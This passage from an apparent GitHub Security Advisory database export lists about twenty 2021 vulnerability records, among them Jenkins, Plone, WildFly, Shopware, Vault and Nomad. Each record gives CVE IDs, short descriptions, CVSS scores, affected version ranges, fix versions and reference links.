[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26919'}, {'type': 'WEB', 'url': 'https://github.com/apache/druid/commit/48953e3508967f5156c69676432b5d4dd25ea678'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/druid'}, {'type': 'WEB', 'url': 'https://github.com/apache/druid/releases/tag/druid-0.20.2'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r443e2916c612fbd119839c0fc0729327d6031913a75081adac5b43ad@%3Cdev.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r470f8c92eb5df45f41b3ae609b6315b6c5ff51b3ceb2f09f00ca620f@%3Cdev.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6bc68264170046448f823d12c17fd1fd875251d97d60869f58709872@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7a531ec123570cb7875ff991cf115f99e9ef99a48b3cf3fa4f9d9864@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra85fa7d31f9bec1148ffd2e4030934927caa8bff89bca9f61f75e697@%3Cdev.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd87451fce34df54796e66321c40d743a68fb4553d72e7f6f0bc62ebd%40%3Cdev.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re0910cf4c784897774427fecd95912fb565a6bd06d924a55e70bbbfc@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re4c5deb0aae4bace69844d15c9fd1699e907ebfee93bc3926474d110@%3Cdev.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf3ea2a4018e87e6c45d36cf8479af7727dcc276edabd2f7cf59e0c5f@%3Cdev.druid.apache.org%3E'}]
{'cwe_ids': ['CWE-668'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T20:50:36Z', 'nvd_published_at': '2021-03-30T08:15:00Z'}
1.4.0
GHSA-xrg9-wwrq-xmx9
2021-06-16T20:03:42Z
2021-06-16T17:11:30Z
null
['CVE-2021-21661']
Missing Authorization
Jenkins Kubernetes CLI Plugin 1.10.0 and earlier does not perform permission checks in several HTTP endpoints, allowing attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:kubernetes-cli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21661'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2021-06-10/#SECURITY-2370'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/06/10/14'}]
{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-14T19:17:11Z', 'nvd_published_at': '2021-06-10T15:15:00Z'}
1.4.0
GHSA-p9cf-qjxq-vxw6
2021-06-17T20:04:36Z
2021-06-08T18:52:27Z
null
['CVE-2020-1719']
Privilege Context Switching Error in wildlfy
A flaw was found in wildfly. The EJBContext principle is not popped back after invoking another EJB using a different Security Domain. The highest threat from this vulnerability is to data confidentiality and integrity. Versions before wildfly 20.0.0.Final are affected.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.wildfly.bom:wildfly'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '20.0.0.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 19.1.0.Final'}}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1719'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1796617'}]
{'cwe_ids': ['CWE-270'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-08T17:28:03Z', 'nvd_published_at': '2021-06-07T17:15:00Z'}
1.4.0
GHSA-35rg-466w-77h3
2021-05-27T21:54:47Z
2021-06-18T18:44:50Z
null
['CVE-2021-33507']
Cross-site scripting in Products.CMFCore, Products.PluggableAuthService, Plone
Zope Products.CMFCore before 2.5.1 and Products.PluggableAuthService before 2.6.2, as used in Plone through 5.2.4 and other products, allow Reflected XSS.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'Products.CMFCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Products.PluggableAuthService'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Plone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.2.4'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33507'}, {'type': 'WEB', 'url': 'https://plone.org/security/hotfix/20210518/reflected-xss-in-various-spots'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/22/1'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-27T21:54:47Z', 'nvd_published_at': '2021-05-21T22:15:00Z'}
1.4.0
GHSA-hm2h-f456-6j88
2021-05-27T22:10:55Z
2021-06-08T23:20:04Z
null
['CVE-2021-33512']
Cross-site scripting in Plone
Plone through 5.2.4 allows stored XSS attacks (by a Contributor) by uploading an SVG or HTML document.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'Plone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.2.4'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33512'}, {'type': 'WEB', 'url': 'https://plone.org/security/hotfix/20210518/stored-xss-from-file-upload-svg-html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/22/1'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-27T22:10:55Z', 'nvd_published_at': '2021-05-21T22:15:00Z'}
1.4.0
GHSA-q7fr-vqhq-v5xr
2022-08-10T23:55:48Z
2021-06-16T17:39:05Z
null
['CVE-2021-26118']
Apache ActiveMQ Artemis vulnerable to Improper Access Control
While investigating ARTEMIS-2964 it was found that the creation of advisory messages in the OpenWire protocol head of Apache ActiveMQ Artemis 2.15.0 bypassed policy based access control for the entire session. Production of advisory messages was not subject to access control in error.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.activemq:artemis-openwire-protocol'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.16.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26118'}, {'type': 'WEB', 'url': 'https://github.com/apache/activemq-artemis/commit/e5566d52116d81611d914548adc3cbb14d7118d4'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/activemq-artemis'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rafd5d7cf303772a0118865262946586921a65ebd98fc24f56c812574@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/activemq-users/202101.mbox/%3CCAH%2BvQmMUNnkiXv2-d3ucdErWOsdnLi6CgnK%2BVfixyJvTgTuYig%40mail.gmail.com%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210827-0002/'}]
{'cwe_ids': ['CWE-284', 'CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T23:06:41Z', 'nvd_published_at': '2021-01-27T19:15:00Z'}
1.4.0
GHSA-p696-gf58-9w97
2021-06-25T15:36:05Z
2021-06-29T17:23:10Z
null
['CVE-2021-32709']
Missing Authentication for Critical Function
Shopware is an open source eCommerce platform. Creation of order credits was not validated by ACL in admin orders. Users are recommend to update to the current version 6.4.1.1. You can get the update to 6.4.1.1 regularly via the Auto-Updater or directly via the download overview. For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.1.0'}}]
[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-g7w8-pp9w-7p32'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32709'}, {'type': 'WEB', 'url': 'https://www.shopware.com/en/changelog/#6-4-1-1'}]
{'cwe_ids': ['CWE-306'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-25T15:36:05Z', 'nvd_published_at': '2021-06-24T19:15:00Z'}
1.4.0
GHSA-q8pj-2vqx-8ggc
2021-12-02T17:48:49Z
2021-06-07T22:11:39Z
null
['CVE-2021-33587']
Denial of service in css-what
The css-what package 4.0.0 through 5.0.0 for Node.js does not ensure that attribute parsing has Linear Time Complexity relative to the size of the input.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'css-what'}, 'ecosystem_specific': {'affected_functions': ['css-what.parse', 'css-what.stringify']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '5.0.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.0.0'}}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33587'}, {'type': 'WEB', 'url': 'https://github.com/fb55/css-what/commit/4cdaacfd0d4b6fd00614be030da0dea6c2994655'}, {'type': 'PACKAGE', 'url': 'https://github.com/fb55/css-what'}, {'type': 'WEB', 'url': 'https://github.com/fb55/css-what/releases/tag/v5.0.1'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/03/msg00001.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210706-0007/'}]
{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T18:12:32Z', 'nvd_published_at': '2021-05-28T20:15:00Z'}
1.4.0
GHSA-h45p-w933-jxh3
2021-06-01T18:59:14Z
2021-06-01T21:20:22Z
null
[]
Improper Verification of Cryptographic Signature in aws-encryption-sdk-javascript
### Impact This advisory addresses several LOW severity issues with streaming signed messages and restricting processing of certain types of invalid messages. This ESDK supports a streaming mode where callers may stream the plaintext of signed messages before the ECDSA signature is validated. In addition to these signatures, the ESDK uses AES-GCM encryption and all plaintext is verified before being released to a caller. There is no impact on the integrity of the ciphertext or decrypted plaintext, however some callers may rely on the the ECDSA signature for non-repudiation. Without validating the ECDSA signature, an actor with trusted KMS permissions to decrypt a message may also be able to encrypt messages. This update introduces a new API for callers who wish to stream only unsigned messages. For customers who process ESDK messages from untrusted sources, this update also introduces a new configuration to limit the number of Encrypted Data Keys (EDKs) that the ESDK will attempt to process per message. This configuration provides customers with a way to limit the number of AWS KMS Decrypt API calls that the ESDK will make per message. This setting will reject messages with more EDKs than the configured limit. Finally, this update adds early rejection of invalid messages with certain invalid combinations of algorithm suite and header data. ### Patches Fixed in versions 1.9 and 2.2. We recommend that all users upgrade to address these issues. Customers leveraging the ESDK’s streaming features have several options to protect signature validation. One is to ensure that client code reads to the end of the stream before using released plaintext. With this release, using the new API for streaming and falling back to the non-streaming decrypt API for signed messages prevents using any plaintext from signed data before the signature is validated. See https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x Users processing ESDK messages from untrusted sources should use the new maximum encrypted data keys parameter. See https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x ### Workarounds None ### For more information https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/concepts.html#digital-sigs https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x
[]
[{'package': {'ecosystem': 'npm', 'name': '@aws-crypto/client-browser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@aws-crypto/client-browser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.2.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@aws-crypto/client-node'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@aws-crypto/client-node'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.2.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/aws/aws-encryption-sdk-javascript/security/advisories/GHSA-h45p-w933-jxh3'}]
{'cwe_ids': ['CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T18:59:14Z', 'nvd_published_at': None}
1.4.0
GHSA-r4gv-vj59-cccm
2021-05-21T18:06:39Z
2021-06-23T17:27:27Z
null
['CVE-2020-26283']
Control character injection in console output in github.com/ipfs/go-ipfs
### Impact Control characters are not escaped from console output. This can result in hiding input from the user which could result in the user taking an unknown, malicious action. ### Patches <!-- _Has the problem been patched? What versions should users upgrade to?_ --> - Patched via https://github.com/ipfs/go-ipfs/pull/7831 in v0.8.0 ### For more information If you have any questions or comments about this advisory: * Open an issue in [go-ipfs](http://github.com/ipfs/go-ipfs) * Email us at [security@ipfs.io](mailto:security@ipfs.io)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/ipfs/go-ipfs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/ipfs/go-ipfs/security/advisories/GHSA-r4gv-vj59-cccm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26283'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/go-ipfs/pull/7831'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/go-ipfs/commit/fb0a9acd2d8288bd1028c3219a420de62a09683a'}]
{'cwe_ids': ['CWE-116', 'CWE-150'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T18:06:39Z', 'nvd_published_at': None}
1.4.0
GHSA-3r8w-mphv-2f3f
2023-08-08T19:57:21Z
2021-06-21T17:12:25Z
null
['CVE-2021-23396']
Prototype Pollution in lutils
All versions of package lutils are vulnerable to Prototype Pollution via the main (merge) function.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]
[{'package': {'ecosystem': 'npm', 'name': 'lutils'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.4.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23396'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-LUTILS-1311023'}]
{'cwe_ids': ['CWE-1321'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-18T18:35:57Z', 'nvd_published_at': '2021-06-17T17:15:00Z'}
1.4.0
GHSA-j239-4gqg-5j54
2021-06-03T19:22:05Z
2021-06-03T19:22:22Z
null
['CVE-2017-1000486']
Inadequate Encryption Strength
Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.primefaces:primefaces'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0'}, {'fixed': '6.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000486'}, {'type': 'WEB', 'url': 'https://github.com/primefaces/primefaces/issues/1152'}, {'type': 'WEB', 'url': 'https://cryptosense.com/weak-encryption-flaw-in-primefaces/'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/43733/'}, {'type': 'WEB', 'url': 'http://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html'}]
{'cwe_ids': ['CWE-326'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-03T19:22:05Z', 'nvd_published_at': None}
1.4.0
GHSA-5w25-hxp5-h8c9
2021-06-17T18:47:52Z
2021-06-21T17:12:13Z
null
['CVE-2021-32685']
Improper Verification of Cryptographic Signature
tEnvoy contains the PGP, NaCl, and PBKDF2 in node.js and the browser (hashing, random, encryption, decryption, signatures, conversions), used by TogaTech.org. In versions prior to 7.0.3, the `verifyWithMessage` method of `tEnvoyNaClSigningKey` always returns `true` for any signature that has a SHA-512 hash matching the SHA-512 hash of the message even if the signature was invalid. This issue is patched in version 7.0.3. As a workaround: In `tenvoy.js` under the `verifyWithMessage` method definition within the `tEnvoyNaClSigningKey` class, ensure that the return statement call to `this.verify` ends in `.verified`.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'tenvoy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.0.3'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/TogaTech/tEnvoy/security/advisories/GHSA-7r96-8g3x-g36m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32685'}, {'type': 'WEB', 'url': 'https://github.com/TogaTech/tEnvoy/commit/a121b34a45e289d775c62e58841522891dee686b'}, {'type': 'WEB', 'url': 'https://github.com/TogaTech/tEnvoy/releases/tag/v7.0.3'}]
{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-17T18:47:52Z', 'nvd_published_at': '2021-06-16T01:15:00Z'}
1.4.0
GHSA-w3jx-wv97-67ph
2021-05-28T18:03:43Z
2021-06-29T21:25:27Z
null
['CVE-2021-33496']
Cross-site scripting in Dutchcoders transfer.sh
Dutchcoders transfer.sh before 1.2.4 allows XSS via an inline view.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/dutchcoders/transfer.sh'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.4'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33496'}, {'type': 'WEB', 'url': 'https://github.com/dutchcoders/transfer.sh/pull/373'}, {'type': 'WEB', 'url': 'https://github.com/dutchcoders/transfer.sh/commit/9df18fdc69de2e71f30d8c1e6bfab2fda2e52eb4'}, {'type': 'WEB', 'url': 'https://github.com/dutchcoders/transfer.sh/releases/tag/v1.2.4'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.me/advisories/43'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-28T18:03:43Z', 'nvd_published_at': '2021-05-24T05:15:00Z'}
1.4.0
GHSA-38j9-7pp9-2hjw
2021-06-17T20:00:42Z
2021-06-08T18:52:05Z
null
['CVE-2021-32923']
Invalid session token expiration
HashiCorp Vault and Vault Enterprise allowed the renewal of nearly-expired token leases and dynamic secret leases (specifically, those within 1 second of their maximum TTL), which caused them to be incorrectly treated as non-expiring during subsequent use. Fixed in 1.5.9, 1.6.5, and 1.7.2.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.0'}, {'fixed': '1.7.2'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.6.0'}, {'fixed': '1.6.5'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.10.0'}, {'fixed': '1.5.9'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32923'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2021-15-vault-renewed-nearly-expired-leases-with-incorrect-non-expiring-ttls/24603'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202207-01'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/vault/'}]
{'cwe_ids': ['CWE-613'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-04T18:42:40Z', 'nvd_published_at': '2021-06-03T11:15:00Z'}
1.4.0
GHSA-5v5h-4w2g-gxxc
2021-05-03T16:51:32Z
2021-06-08T20:12:23Z
null
['CVE-2021-31777']
SQL Injection in t3/dce
The dce (aka Dynamic Content Element) extension 2.2.0 through 2.6.x before 2.6.2, and 2.7.x before 2.7.1, for TYPO3 allows SQL Injection via a backend user account.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L'}]
[{'package': {'ecosystem': 'Packagist', 'name': 't3/dce'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.6.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31777'}, {'type': 'WEB', 'url': 'https://bitbucket.org/ArminVieweg/dce/commits/998a2392f69f2153797c5ace6e8914ca309e70c7'}, {'type': 'WEB', 'url': 'https://excellium-services.com/cert-xlm-advisory/'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/t3/dce'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2021-005'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/162429/TYPO3-6.2.1-SQL-Injection.html'}]
{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-03T16:51:32Z', 'nvd_published_at': '2021-04-28T07:15:00Z'}
1.4.0
GHSA-vf6q-9f2f-mwhv
2021-06-23T18:01:24Z
2021-06-24T20:28:21Z
null
['CVE-2021-32575']
Improper network isolation in Hashicorp Nomad
HashiCorp Nomad and Nomad Enterprise up to version 1.0.4 bridge networking mode allows ARP spoofing from other bridged tasks on the same node. Fixed in 0.12.12, 1.0.5, and 1.1.0 RC1.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.5'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.12'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32575'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2021-14-nomad-bridge-networking-mode-allows-arp-spoofing-from-other-bridged-tasks-on-same-node/24296'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/nomad'}]
{'cwe_ids': ['CWE-1100'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-18T18:39:21Z', 'nvd_published_at': '2021-06-17T19:15:00Z'}
1.4.0
GHSA-hj56-84jw-67h6
2023-01-24T15:08:12Z
2021-06-23T23:42:04Z
null
['CVE-2021-32823']
Potential Denial-of-Service in bindata
In the bindata RubyGem before version 2.4.10 there is a potential denial-of-service vulnerability. In affected versions it is very slow for certain classes in BinData to be created. For example `BinData::Bit100000`, `BinData::Bit100001`, `BinData::Bit100002`, `BinData::Bit<N>`. In combination with `<user_input>.constantize` there is a potential for a CPU-based DoS. In version 2.4.10, bindata improved the creation time of Bits and Integers.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L'}]
[{'package': {'ecosystem': 'RubyGems', 'name': 'bindata'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.10'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32823'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/issues/476'}, {'type': 'WEB', 'url': 'https://github.com/dmendel/bindata/commit/d99f050b88337559be2cb35906c1f8da49531323'}, {'type': 'WEB', 'url': 'https://about.gitlab.com/releases/2021/06/01/security-release-gitlab-13-12-2-released/#update-bindata-dependency'}, {'type': 'PACKAGE', 'url': 'https://github.com/dmendel/bindata'}, {'type': 'WEB', 'url': 'https://github.com/dmendel/bindata/blob/master/ChangeLog.rdoc#version-2410-2021-05-18-'}, {'type': 'WEB', 'url': 'https://github.com/dmendel/bindata/blob/v2.4.10/ChangeLog.rdoc#version-2410-2021-05-18-'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/bindata'}]
{'cwe_ids': ['CWE-400'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-06-23T23:41:30Z', 'nvd_published_at': '2021-06-24T00:15:00Z'}
1.4.0
GHSA-gc45-j3m5-8qfq
2021-05-28T21:56:18Z
2021-06-08T20:12:32Z
null
['CVE-2021-30108']
Server-Side Request Forgery in Feehi CMS
Feehi CMS 2.1.1 is affected by a Server-side request forgery (SSRF) vulnerability. When the user modifies the HTTP Referer header to any url, the server can make a request to it.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'feehi/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-30108'}, {'type': 'WEB', 'url': 'https://github.com/liufee/cms/issues/57'}, {'type': 'WEB', 'url': 'https://github.com/liufee/cms/issues/57#issuecomment-1230070460'}, {'type': 'WEB', 'url': 'https://github.com/liufee/cms/commit/d45cb9cb26d6f5ef491fa2c7d87ac7f26091bd7c'}]
{'cwe_ids': ['CWE-918'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-28T21:56:18Z', 'nvd_published_at': '2021-05-24T20:15:00Z'}
1.4.0
GHSA-vrf2-xghr-j52v
2021-10-05T17:26:41Z
2021-06-28T18:20:42Z
null
[]
Private files publicly accessible with Cloud Storage providers
### Impact Private files publicly accessible with Cloud Storage providers when the hashed URL is known ### Patches We recommend first changing your configuration to set the correct visibility according to the documentation. The visibility must be at the same level as `type`. When the Storage is saved on Amazon AWS we recommending disabling public access to the bucket containing the private files: https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html Otherwise, update to Shopware 6.4.1.1 or install or update the Security plugin (https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659) and run the command `./bin/console s3:set-visibility` to correct your cloud file visibilities
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
